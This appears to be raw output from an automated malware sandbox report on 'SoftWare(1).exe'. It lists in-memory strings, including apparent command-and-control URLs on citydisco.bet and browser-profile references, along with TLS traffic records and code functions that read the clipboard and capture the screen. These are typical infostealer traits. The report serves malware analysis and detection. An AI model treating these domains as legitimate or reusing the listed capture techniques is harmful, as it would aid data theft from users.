            Source: SoftWare(1).exe, 00000001.00000002.1326354243.000000000057E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISfbikF
            Source: SoftWare(1).exe, 00000001.00000002.1326354243.000000000057E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIShima
            Source: SoftWare(1).exe, 00000001.00000002.1326354243.000000000057E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISl
            Source: SoftWare(1).exe, 00000001.00000003.1325657204.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000002.1326136884.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1242293904.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJIS
            Source: SoftWare(1).exe, 00000001.00000003.1325657204.0000000000504000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000002.1326136884.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJIS;x
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: SoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: SoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: SoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: SoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: SoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: SoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: SoftWare(1).exe, 00000001.00000003.1213090592.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49727 version: TLS 1.2
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043F410 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,1_2_0043F410
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043F410 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,1_2_0043F410
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043FC48 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,1_2_0043FC48
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF31F00_2_00DF31F0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF36400_2_00DF3640
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E200D00_2_00E200D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0E0A00_2_00E0E0A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF80900_2_00DF8090
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF40800_2_00DF4080
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1D0800_2_00E1D080
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E008900_2_00E00890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E138900_2_00E13890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E218900_2_00E21890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF58A00_2_00DF58A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1F0600_2_00E1F060
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E040400_2_00E04040
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF60700_2_00DF6070
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0A8200_2_00E0A820
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E090200_2_00E09020
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1A0200_2_00E1A020
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF10000_2_00DF1000
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0C0100_2_00E0C010
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E238130_2_00E23813
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0B1E00_2_00E0B1E0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1F9B00_2_00E1F9B0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E061800_2_00E06180
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E231600_2_00E23160
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF49400_2_00DF4940
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0C9400_2_00E0C940
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFE1700_2_00DFE170
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E229200_2_00E22920
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E191000_2_00E19100
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E3C9080_2_00E3C908
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF71300_2_00DF7130
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E101100_2_00E10110
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1F2E00_2_00E1F2E0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFF2D00_2_00DFF2D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E052C00_2_00E052C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E19AB00_2_00E19AB0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF22800_2_00DF2280
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E042900_2_00E04290
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFEAA00_2_00DFEAA0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E18A500_2_00E18A50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E26A540_2_00E26A54
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E152200_2_00E15220
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E16A000_2_00E16A00
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E182000_2_00E18200
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E10A100_2_00E10A10
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF52200_2_00DF5220
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF92200_2_00DF9220
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E073F00_2_00E073F0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0F3D00_2_00E0F3D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0ABA00_2_00E0ABA0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF63900_2_00DF6390
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E033900_2_00E03390
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0FB700_2_00E0FB70
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E113700_2_00E11370
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF83400_2_00DF8340
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1EB400_2_00E1EB40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E103500_2_00E10350
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFC3100_2_00DFC310
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFB3000_2_00DFB300
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0CCE00_2_00E0CCE0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFE4C00_2_00DFE4C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E03CC00_2_00E03CC0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF6C800_2_00DF6C80
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E064800_2_00E06480
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E154800_2_00E15480
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E224800_2_00E22480
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E004900_2_00E00490
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E23C900_2_00E23C90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF54A00_2_00DF54A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E15C600_2_00E15C60
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E234770_2_00E23477
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF2C400_2_00DF2C40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0EC400_2_00E0EC40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E18C400_2_00E18C40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E184500_2_00E18450
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E314200_2_00E31420
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E2B41A0_2_00E2B41A
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF5C200_2_00DF5C20
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E235C00_2_00E235C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1F5D00_2_00E1F5D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E055B00_2_00E055B0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1EDB00_2_00E1EDB0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF95800_2_00DF9580
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1DD800_2_00E1DD80
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0D5600_2_00E0D560
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E085400_2_00E08540
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0DD500_2_00E0DD50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1FD500_2_00E1FD50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E095000_2_00E09500
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF7D300_2_00DF7D30
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFF5300_2_00DFF530
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFAD300_2_00DFAD30
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1C5100_2_00E1C510
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E026F00_2_00E026F0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E21EF00_2_00E21EF0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0C6A00_2_00E0C6A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E1B6800_2_00E1B680
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E02E900_2_00E02E90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E186900_2_00E18690
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E22E900_2_00E22E90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF86400_2_00DF8640
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E06E400_2_00E06E40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E07E500_2_00E07E50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF46600_2_00DF4660
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E076200_2_00E07620
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E00E200_2_00E00E20
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E206200_2_00E20620
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0B6300_2_00E0B630
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E196300_2_00E19630
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF67D00_2_00DF67D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF9FF00_2_00DF9FF0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DF17900_2_00DF1790
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFB7800_2_00DFB780
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E3E7820_2_00E3E782
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E10F800_2_00E10F80
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E067900_2_00E06790
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E0FF700_2_00E0FF70
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E097200_2_00E09720
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E19F000_2_00E19F00
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00DFE7300_2_00DFE730
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041C8331_2_0041C833
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004380C81_2_004380C8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004110F91_2_004110F9
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004218901_2_00421890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004378B81_2_004378B8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040BA501_2_0040BA50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00412AF81_2_00412AF8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004443001_2_00444300
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0042CBA01_2_0042CBA0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004283A01_2_004283A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044C3A01_2_0044C3A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041BCC01_2_0041BCC0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00447DF01_2_00447DF0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0042FE401_2_0042FE40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044CE101_2_0044CE10
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00415EF91_2_00415EF9
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040EFAE1_2_0040EFAE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004010401_2_00401040
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041F0651_2_0041F065
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004178701_2_00417870
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004278301_2_00427830
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004458301_2_00445830
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004498321_2_00449832
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040D9401_2_0040D940
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004021401_2_00402140
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004261501_2_00426150
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004511501_2_00451150
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004391601_2_00439160
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004421681_2_00442168
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040B9701_2_0040B970
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004511701_2_00451170
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004249001_2_00424900
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0042D92B1_2_0042D92B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0045113C1_2_0045113C
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040F9C01_2_0040F9C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004139D01_2_004139D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043B9F91_2_0043B9F9
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004121851_2_00412185
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004452501_2_00445250
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00429A701_2_00429A70
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0042020C1_2_0042020C
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00426A151_2_00426A15
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041E21B1_2_0041E21B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004292C01_2_004292C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044CAE01_2_0044CAE0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00408A801_2_00408A80
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044B2801_2_0044B280
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004312901_2_00431290
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00445AA01_2_00445AA0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004512AC1_2_004512AC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004252B01_2_004252B0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00402B501_2_00402B50
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041C8331_2_0041C833
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040A3201_2_0040A320
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040C3201_2_0040C320
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00416B811_2_00416B81
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044B3801_2_0044B380
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00411C5F1_2_00411C5F
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0042D4601_2_0042D460
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004324071_2_00432407
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043F4101_2_0043F410
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0042F4301_2_0042F430
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043DC311_2_0043DC31
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004384C31_2_004384C3
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040D4D01_2_0040D4D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004434DF1_2_004434DF
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041DCDF1_2_0041DCDF
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044B4F01_2_0044B4F0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004104831_2_00410483
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0042F4891_2_0042F489
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00424C901_2_00424C90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044BCB61_2_0044BCB6
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004095401_2_00409540
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004435401_2_00443540
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043155F1_2_0043155F
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004035601_2_00403560
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004255601_2_00425560
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00413D091_2_00413D09
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040AD201_2_0040AD20
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043B5361_2_0043B536
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041EDDC1_2_0041EDDC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044B5801_2_0044B580
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00420D901_2_00420D90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00407DA01_2_00407DA0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004305B21_2_004305B2
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004336401_2_00433640
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004486501_2_00448650
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043C6101_2_0043C610
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004376271_2_00437627
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0044B6221_2_0044B622
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040CE301_2_0040CE30
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040E6D01_2_0040E6D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00444ED01_2_00444ED0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00445ED11_2_00445ED1
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004326E01_2_004326E0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004386EC1_2_004386EC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00430E931_2_00430E93
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00410EAB1_2_00410EAB
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00403F001_2_00403F00
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0043E7031_2_0043E703
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041AF001_2_0041AF00
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0040C7101_2_0040C710
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_004367291_2_00436729
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0042D7301_2_0042D730
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00408FC01_2_00408FC0
